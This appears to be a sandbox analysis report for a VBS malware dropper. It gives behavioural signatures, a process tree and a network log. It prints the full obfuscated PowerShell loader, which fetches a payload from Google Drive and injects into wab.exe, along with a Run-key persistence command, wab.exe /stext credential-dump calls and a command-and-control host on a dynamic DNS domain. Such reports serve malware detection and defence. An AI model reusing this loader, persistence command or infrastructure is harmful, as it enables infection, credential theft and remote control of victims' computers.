| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 784 set thread context of 3680 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 2088 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 5072 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 5044 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bmnddfrn"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wjygfqmaioxwboe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.181.190.20.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ab9001.ddns.net | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | 228.67.156.94.in-addr.arpa | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
